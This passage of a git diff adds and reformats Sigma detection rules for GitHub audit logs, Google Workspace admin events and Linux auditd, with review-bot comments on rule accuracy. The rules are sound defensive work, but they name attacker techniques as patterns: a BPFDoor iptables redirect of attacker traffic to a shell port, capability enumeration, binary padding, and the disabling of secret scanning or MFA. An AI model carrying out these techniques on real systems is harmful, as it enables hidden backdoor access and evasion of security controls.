@@ -21,14 +21,9 @@ logsource: detection: selection: action: - - 'project.update_user_permission' - 'org.remove_outside_collaborator' + - 'project.update_user_permission' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' falsepositives: - Validate the actor if permitted to access the repo. - Validate the Multifactor Authentication changes. diff --git a/src/main/resources/rules/github/github_push_protection_bypass_detected.yml b/src/main/resources/rules/github/github_push_protection_bypass_detected.yml new file mode 100644 index 000000000..371e0b330 --- /dev/null +++ b/src/main/resources/rules/github/github_push_protection_bypass_detected.yml @@ -0,0 +1,23 @@ +title: Github Push Protection Bypass Detected +id: 02cf536a-cf21-4876-8842-4159c8aee3cc +status: experimental +description: Detects when a user bypasses the push protection on a secret detected by secret scanning. +references: + - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations + - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html +author: Muhammad Faisal (@faisalusuf) +date: 2024/03/07 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action|contains: 'secret_scanning_push_protection.bypass' + condition: selection +falsepositives: + - Allowed administrative activities. +level: low 
diff --git a/src/main/resources/rules/github/github_push_protection_disabled.yml b/src/main/resources/rules/github/github_push_protection_disabled.yml new file mode 100644 index 000000000..ed6cebfa4 --- /dev/null +++ b/src/main/resources/rules/github/github_push_protection_disabled.yml @@ -0,0 +1,30 @@ +title: Github Push Protection Disabled +id: ccd55945-badd-4bae-936b-823a735d37dd +status: experimental +description: Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules. +references: + - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations + - https://thehackernews.com/2024/03/github-rolls-out-default-secret.html +author: Muhammad Faisal (@faisalusuf) +date: 2024/03/07 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'business_secret_scanning_custom_pattern_push_protection.disabled' + - 'business_secret_scanning_push_protection.disable' + - 'business_secret_scanning_push_protection.disabled_for_new_repos' + - 'org.secret_scanning_custom_pattern_push_protection_disabled' + - 'org.secret_scanning_push_protection_disable' + - 'org.secret_scanning_push_protection_new_repos_disable' + - 'repository_secret_scanning_custom_pattern_push_protection.disabled' + condition: selection +falsepositives: + - Allowed administrative activities. +level: high 
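Review bot: The action list in the new push-protection rule mixes `.disable` and `.disabled` suffixes (`business_secret_scanning_push_protection.disable` next to `business_secret_scanning_custom_pattern_push_protection.disabled`), and because `action:` is an exact match a wrong suffix silently never fires. Each value should be verified against the GitHub audit-log action reference linked under `references`, and the list appears to lack an entry for plain repository-level push protection being disabled even though the description promises "repositories" (only the repository custom-pattern variant is listed). The same verification applies to the secret-scanning rule in the next hunk (github_secret_scanning_feature_disabled.yml), whose list likewise alternates between `.disable` and `.disabled_for_new_repos`.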
diff --git a/src/main/resources/rules/github/github_secret_scanning_feature_disabled.yml b/src/main/resources/rules/github/github_secret_scanning_feature_disabled.yml new file mode 100644 index 000000000..1407a441b --- /dev/null +++ b/src/main/resources/rules/github/github_secret_scanning_feature_disabled.yml @@ -0,0 +1,26 @@ +title: Github Secret Scanning Feature Disabled +id: 3883d9a0-fd0f-440f-afbb-445a2a799bb8 +status: experimental +description: Detects if the secret scanning feature is disabled for an enterprise or repository. +references: + - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning +author: Muhammad Faisal (@faisalusuf) +date: 2024/03/07 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + product: github + service: audit + definition: 'Requirements: The audit log streaming feature must be enabled to be able to receive such logs. You can enable following the documentation here: https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/streaming-the-audit-log-for-your-enterprise#setting-up-audit-log-streaming' +detection: + selection: + action: + - 'business_secret_scanning.disable' + - 'business_secret_scanning.disabled_for_new_repos' + - 'repository_secret_scanning.disable' + - 'secret_scanning.disable' + condition: selection +falsepositives: + - Allowed administrative activities. +level: high diff --git a/src/main/resources/rules/github/github_self_hosted_runner_changes_detected.yml b/src/main/resources/rules/github/github_self_hosted_runner_changes_detected.yml index 7dc420524..1c5088f65 100644 --- a/src/main/resources/rules/github/github_self_hosted_runner_changes_detected.yml +++ b/src/main/resources/rules/github/github_self_hosted_runner_changes_detected.yml 
@@ -1,11 +1,11 @@ title: Github Self Hosted Runner Changes Detected id: f8ed0e8f-7438-4b79-85eb-f358ef2fbebd -status: experimental +status: test description: | A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context. -author: Muhammad Faisal +author: Muhammad Faisal (@faisalusuf) date: 2023/01/27 references: - https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners @@ -31,23 +31,13 @@ detection: - 'org.remove_self_hosted_runner' - 'org.runner_group_created' - 'org.runner_group_removed' - - 'org.runner_group_updated' - - 'org.runner_group_runners_added' - 'org.runner_group_runner_removed' + - 'org.runner_group_runners_added' - 'org.runner_group_runners_updated' + - 'org.runner_group_updated' - 'repo.register_self_hosted_runner' - 'repo.remove_self_hosted_runner' condition: selection -fields: - - 'action' - - 'actor' - - 'org' - - 'actor_location.country_code' - - 'transport_protocol_name' - - 'repository' - - 'repo' - - 'repository_public' - - '@timestamp' falsepositives: - Allowed self-hosted runners changes in the environment. - A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days. diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_application_access_levels_modified.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_application_access_levels_modified.yml new file mode 100644 index 000000000..9632a4d0b --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_application_access_levels_modified.yml 
@@ -0,0 +1,28 @@ +title: Google Workspace Application Access Level Modified +id: 22f2fb54-5312-435d-852f-7c74f81684ca +status: experimental +description: | + Detects when an access level is changed for a Google workspace application. + An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. + An adversary would be able to remove access levels to gain easier access to Google workspace resources. +references: + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings + - https://support.google.com/a/answer/9261439 +author: Bryan Lim +date: 2024/01/12 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098.003 +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: 'admin.googleapis.com' + eventName: 'CHANGE_APPLICATION_SETTING' + setting_name|startswith: 'ContextAwareAccess' + condition: selection +falsepositives: + - Legitimate administrative activities changing the access levels for an application +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_application_removed.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_application_removed.yml new file mode 100644 index 000000000..bd00afe3d --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_application_removed.yml 
@@ -0,0 +1,26 @@ +title: Google Workspace Application Removed +id: ee2803f0-71c8-4831-b48b-a1fc57601ee4 +status: test +description: Detects when an an application is removed from Google Workspace. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST +author: Austin Songer +date: 2021/08/26 +modified: 2023/10/11 +tags: + - attack.impact +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - REMOVE_APPLICATION + - REMOVE_APPLICATION_FROM_WHITELIST + condition: selection +falsepositives: + - Application being removed may be performed by a System Administrator. +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_granted_domain_api_access.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_granted_domain_api_access.yml new file mode 100644 index 000000000..332ea09bf --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_granted_domain_api_access.yml 
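Review bot: The description of the new Google Workspace Application Removed rule reads `Detects when an an application is removed`; the doubled article should be `description: Detects when an application is removed from Google Workspace.` The same slip recurs in the role rules later in this commit (`Detects when an a role is modified or deleted` in gcp_gworkspace_role_modified_or_deleted.yml and `Detects when an a role privilege is deleted` in gcp_gworkspace_role_privilege_deleted.yml) and as `an Google Workspace user` in gcp_gworkspace_user_granted_admin_privileges.yml. Since these are newly added files, fixing the text here avoids carrying the typos into the synced copy.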
@@ -0,0 +1,25 @@ +title: Google Workspace Granted Domain API Access +id: 04e2a23a-9b29-4a5c-be3a-3542e3f982ba +status: test +description: Detects when an API access service account is granted domain authority. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS +author: Austin Songer +date: 2021/08/23 +modified: 2023/10/11 +tags: + - attack.persistence + - attack.t1098 +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: AUTHORIZE_API_CLIENT_ACCESS + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_mfa_disabled.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_mfa_disabled.yml new file mode 100644 index 000000000..14b5c94b1 --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_mfa_disabled.yml 
@@ -0,0 +1,28 @@ +title: Google Workspace MFA Disabled +id: 780601d1-6376-4f2a-884e-b8d45599f78c +status: test +description: Detects when multi-factor authentication (MFA) is disabled. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION +author: Austin Songer +date: 2021/08/26 +modified: 2023/10/11 +tags: + - attack.impact +logsource: + product: gcp + service: google_workspace.admin +detection: + selection_base: + eventService: admin.googleapis.com + eventName: + - ENFORCE_STRONG_AUTHENTICATION + - ALLOW_STRONG_AUTHENTICATION + selection_eventValue: + new_value: 'false' + condition: all of selection* +falsepositives: + - MFA may be disabled and performed by a system administrator. +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml new file mode 100644 index 000000000..dd6fee807 --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml 
@@ -0,0 +1,27 @@ +title: Google Workspace Role Modified or Deleted +id: 6aef64e3-60c6-4782-8db3-8448759c714e +status: test +description: Detects when an a role is modified or deleted in Google Workspace. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings +author: Austin Songer +date: 2021/08/24 +modified: 2023/10/11 +tags: + - attack.impact +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - DELETE_ROLE + - RENAME_ROLE + - UPDATE_ROLE + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_role_privilege_deleted.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_role_privilege_deleted.yml new file mode 100644 index 000000000..6732d34b6 --- /dev/null +++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_role_privilege_deleted.yml @@ -0,0 +1,24 @@ +title: Google Workspace Role Privilege Deleted +id: bf638ef7-4d2d-44bb-a1dc-a238252e6267 +status: test +description: Detects when an a role privilege is deleted in Google Workspace. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings +author: Austin Songer +date: 2021/08/24 +modified: 2023/10/11 +tags: + - attack.impact +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: REMOVE_PRIVILEGE + condition: selection +falsepositives: + - Unknown + +level: medium diff --git a/src/main/resources/rules/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml b/src/main/resources/rules/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml new file mode 100644 index 000000000..321fa59ff --- /dev/null 
+++ b/src/main/resources/rules/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml @@ -0,0 +1,26 @@ +title: Google Workspace User Granted Admin Privileges +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +status: test +description: Detects when an Google Workspace user is granted admin privileges. +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE +author: Austin Songer +date: 2021/08/23 +modified: 2023/10/11 +tags: + - attack.persistence + - attack.t1098 +logsource: + product: gcp + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - GRANT_DELEGATED_ADMIN_PRIVILEGES + - GRANT_ADMIN_PRIVILEGE + condition: selection +falsepositives: + - Google Workspace admin role privileges, may be modified by system administrators. +level: medium diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml deleted file mode 100644 index adf31121e..000000000 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml +++ /dev/null 
@@ -1,35 +0,0 @@ -title: Edit of .bash_profile and .bashrc -id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9 -status: test -description: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell. -author: Peter Matkovski -references: - - 'MITRE Attack technique T1156; .bash_profile and .bashrc. ' -date: 2019/05/12 -modified: 2022/02/22 -logsource: - product: linux - service: auditd -detection: - selection: - type: 'PATH' - name: - - '/root/.bashrc' - - '/root/.bash_profile' - - '/root/.profile' - - '/home/*/.bashrc' - - '/home/*/.bash_profile' - - '/home/*/.profile' - - '/etc/profile' - - '/etc/shells' - - '/etc/bashrc' - - '/etc/csh.cshrc' - - '/etc/csh.login' - condition: selection -falsepositives: - - Admin or User activity -level: medium -tags: - - attack.s0003 - - attack.persistence - - attack.t1546.004 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_audio_capture.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_audio_capture.yml index 0692945f6..50f45bc6e 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_audio_capture.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_audio_capture.yml 
@@ -1,27 +1,26 @@ title: Audio Capture id: a7af2487-9c2f-42e4-9bb9-ff961f0561d5 +status: test description: Detects attempts to record audio with arecord utility - #the actual binary that arecord is using and that has to be monitored is /usr/bin/aplay +references: + - https://linux.die.net/man/1/arecord + - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa author: 'Pawel Mazur' -status: experimental date: 2021/09/04 -references: - - https://linux.die.net/man/1/arecord - - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa - - https://attack.mitre.org/techniques/T1123/ +modified: 2022/10/09 +tags: + - attack.collection + - attack.t1123 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: arecord - a1: '-vv' - a2: '-fdat' - condition: selection -tags: - - attack.collection - - attack.t1123 + selection: + type: EXECVE + a0: arecord + a1: '-vv' + a2: '-fdat' + condition: selection falsepositives: - - Unknown + - Unknown level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_auditing_config_change.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_auditing_config_change.yml index 71ce7553c..8b6e756b3 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_auditing_config_change.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_auditing_config_change.yml 
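Review bot: The hunk drops the inline comment stating that the binary actually executed by arecord, and the one to monitor, is /usr/bin/aplay, and nothing on the new side preserves that operational detail. If the note is still accurate it belongs in a `definition:` under `logsource` or in the description rather than being lost; if it was wrong, removing it is fine but the commit does not say so. Separately, the re-indented selection matches only the exact argument order `arecord -vv -fdat`, so any other flag order or a path-prefixed `a0` is missed; `a0|endswith: 'arecord'` plus a less rigid argument match would be in line with how the bpfdoor rule later in this commit matches `iptables`.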
@@ -2,30 +2,30 @@ title: Auditing Configuration Changes on Linux Host id: 977ef627-4539-4875-adf4-ed8f780c4922 status: test description: Detect changes in auditd configuration files -author: Mikhail Larin, oscd.community references: - - https://github.com/Neo23x0/auditd/blob/master/audit.rules - - self experience + - https://github.com/Neo23x0/auditd/blob/master/audit.rules + - Self Experience +author: Mikhail Larin, oscd.community date: 2019/10/25 modified: 2021/11/27 +tags: + - attack.defense_evasion + - attack.t1562.006 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: PATH - name: - - /etc/audit/* - - /etc/libaudit.conf - - /etc/audisp/* - condition: selection + selection: + type: PATH + name: + - /etc/audit/* + - /etc/libaudit.conf + - /etc/audisp/* + condition: selection fields: - - exe - - comm - - key + - exe + - comm + - key falsepositives: - - Legitimate administrative activity + - Legitimate administrative activity level: high -tags: - - attack.defense_evasion - - attack.t1562.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_binary_padding.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_binary_padding.yml index 9977fa858..968099af1 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_binary_padding.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_binary_padding.yml 
@@ -1,30 +1,34 @@ -title: 'Binary Padding' +title: Binary Padding - Linux id: c52a914f-3d8b-4b2a-bb75-b3991e75f8ba status: test -description: 'Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.' -author: 'Igor Fits, oscd.community' +description: | + Adversaries may use binary padding to add junk data and change the on-disk representation of malware. + This rule detect using dd and truncate to add a junk data to file. references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md +author: Igor Fits, oscd.community date: 2020/10/13 -modified: 2021/11/27 +modified: 2023/05/03 +tags: + - attack.defense_evasion + - attack.t1027.001 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: 'EXECVE' - truncate: - - 'truncate' - - '-s' - dd: - - 'dd' - - 'if=' - filter: - - 'of=' - condition: execve and (all of truncate or (all of dd and not filter)) + selection_execve: + type: 'EXECVE' + keywords_truncate: + '|all': + - 'truncate' + - '-s' + keywords_dd: + '|all': + - 'dd' + - 'if=' + keywords_filter: + - 'of=' + condition: selection_execve and (keywords_truncate or (keywords_dd and not keywords_filter)) falsepositives: - - Legitimate script work + - Unknown level: high -tags: - - attack.defense_evasion - - attack.t1027.001 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml new file mode 100644 index 000000000..87da3bbb5 --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml 
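Review bot: The falsepositives entry changes from `Legitimate script work` to `Unknown`, which discards a known false-positive source without explanation; the `keywords_dd and not keywords_filter` branch fires on any `dd if=...` without `of=`, which is common in scripts that pipe dd to stdout, so the old entry was the more useful one for analysts. Unless the upstream rule deliberately reset it, keep `- Legitimate script work` (or list both). The `keywords_*` blocks are unbound keyword searches rather than `aN` field matches, so they apply to the whole EXECVE record; that is presumably intended, but a short `definition:` saying so would help whoever tunes the rule.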
@@ -0,0 +1,27 @@ +title: BPFDoor Abnormal Process ID or Lock File Accessed +id: 808146b2-9332-4d78-9416-d7e47012d83d +status: test +description: detects BPFDoor .lock and .pid files access in temporary file storage facility +references: + - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ + - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor +author: Rafal Piasecki +date: 2022/08/10 +tags: + - attack.execution + - attack.t1106 + - attack.t1059 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: + - /var/run/haldrund.pid + - /var/run/xinetd.lock + - /var/run/kdevrund.pid + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml new file mode 100644 index 000000000..4ea35cbb8 --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml 
@@ -0,0 +1,30 @@
+title: Bpfdoor TCP Ports Redirect
+id: 70b4156e-50fc-4523-aa50-c9dddf1993fc
+status: test
+description: |
+ All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'
+ The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.
+references:
+ - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
+ - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
+author: Rafal Piasecki
+date: 2022/08/10
+tags:
+ - attack.defense_evasion
+ - attack.t1562.004
+logsource:
+ product: linux
+ service: auditd
+detection:
+ cmd:
+ type: 'EXECVE'
+ a0|endswith: 'iptables'
+ a1: '-t'
+ a2: 'nat'
+ keywords:
+ - '--to-ports 42'
+ - '--to-ports 43'
+ condition: cmd and keywords
+falsepositives:
+ - Legitimate ports redirect
+level: medium
diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml
index 2ee302365..0efda4f22 100644
--- a/src/main/resources/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml
+++ b/src/main/resources/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml
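Review bot: Both `keywords` entries embed a space (`'--to-ports 42'`), yet auditd writes each execve argument into its own `aN=` field and hex-encodes any single argument that contains whitespace, so the option name and the port value are never adjacent in a raw EXECVE record; the match can only succeed if the collector re-joins the command line, which should be confirmed against a real event before the rule is relied on. If it does not, `keywords: - '--to-ports'` with the port-range intent stated in `description` is the honest fallback, since Sigma has no cross-field adjacency test. The fixed positions `a1: '-t'` / `a2: 'nat'` also assume the table option comes first, so an invocation such as `iptables -w -t nat …` is missed.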
@@ -1,29 +1,30 @@ title: Linux Capabilities Discovery id: fe10751f-1995-40a5-aaa2-c97ccb4123fe -description: Detects attempts to discover the files with setuid/setgid capabilitiy on them. That would allow adversary to escalate their privileges. +status: test +description: Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges. +references: + - https://man7.org/linux/man-pages/man8/getcap.8.html + - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ + - https://mn3m.info/posts/suid-vs-capabilities/ + - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 author: 'Pawel Mazur' -status: experimental date: 2021/11/28 -references: - - https://man7.org/linux/man-pages/man8/getcap.8.html - - https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/ - - https://mn3m.info/posts/suid-vs-capabilities/ - - https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 +modified: 2022/12/25 +tags: + - attack.collection + - attack.privilege_escalation + - attack.t1123 + - attack.t1548 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: EXECVE - a0: getcap - a1: '-r' - a2: '/' - condition: selection -tags: - - attack.collection - - attack.privilege_escalation - - attack.t1123 - - attack.t1548 + selection: + type: EXECVE + a0: getcap + a1: '-r' + a2: '/' + condition: selection falsepositives: - - Unknown + - Unknown level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml index 09d9a55b6..b86345eac 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml 
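Review bot: The re-added `tags` block carries `attack.collection` and `attack.t1123`, but T1123 is Audio Capture and has no relation to a `getcap -r /` enumeration; the references are all about escalation through file capabilities, which `attack.privilege_escalation` / `attack.t1548` already cover. Drop those two lines, or if a discovery mapping is wanted use `- attack.discovery` with `- attack.t1083`. Separately, `a2: '/'` requires the scan to start at the root, so `getcap -r /usr` is not seen; `a2|startswith: '/'` keeps the intent with less brittleness.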
+++ b/src/main/resources/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml @@ -1,29 +1,29 @@ -title: 'File Time Attribute Change' +title: File Time Attribute Change - Linux id: b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b status: test -description: 'Detect file time attribute change to hide new or changes to existing files.' -author: 'Igor Fits, oscd.community' +description: Detect file time attribute change to hide new or changes to existing files. references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md +author: 'Igor Fits, oscd.community' date: 2020/10/15 -modified: 2021/11/27 +modified: 2022/11/28 +tags: + - attack.defense_evasion + - attack.t1070.006 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: 'EXECVE' - touch: - - 'touch' - selection2: - - '-t' - - '-acmr' - - '-d' - - '-r' - condition: execve and touch and selection2 + execve: + type: 'EXECVE' + touch: + - 'touch' + selection2: + - '-t' + - '-acmr' + - '-d' + - '-r' + condition: execve and touch and selection2 falsepositives: - - Unknown + - Unknown level: medium -tags: - - attack.defense_evasion - - attack.t1070.006 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml index eaceefccb..50d720de3 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml 
@@ -1,24 +1,24 @@ -title: Remove Immutable File Attribute +title: Remove Immutable File Attribute - Auditd id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 status: test description: Detects removing immutable file attribute. -author: Jakob Weinzettl, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md +author: Jakob Weinzettl, oscd.community date: 2019/09/23 -modified: 2021/11/27 +modified: 2022/11/26 +tags: + - attack.defense_evasion + - attack.t1222.002 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'EXECVE' - a0|contains: 'chattr' - a1|contains: '-i' - condition: selection + selection: + type: 'EXECVE' + a0|contains: 'chattr' + a1|contains: '-i' + condition: selection falsepositives: - - Administrator interacting with immutable files (e.g. for instance backups). + - Administrator interacting with immutable files (e.g. for instance backups). level: medium -tags: - - attack.defense_evasion - - attack.t1222.002 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_collection.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_collection.yml index b973b0bb2..d7f6633ff 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_collection.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_clipboard_collection.yml 
@@ -1,16 +1,22 @@ -title: Clipboard Collection with Xclip Tool +title: Clipboard Collection with Xclip Tool - Auditd id: 214e7e6c-f21b-47ff-bb6f-551b2d143fcf -description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +status: test +description: | + Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. + Xclip has to be installed. + Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +references: + - https://linux.die.net/man/1/xclip + - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ author: 'Pawel Mazur' -status: experimental date: 2021/09/24 -references: - - https://attack.mitre.org/techniques/T1115/ - - https://linux.die.net/man/1/xclip - - https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ +modified: 2022/11/26 +tags: + - attack.collection + - attack.t1115 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: selection: type: EXECVE @@ -23,9 +29,6 @@ detection: - clip a3: '-o' condition: selection -tags: - - attack.collection - - attack.t1115 falsepositives: - - Legitimate 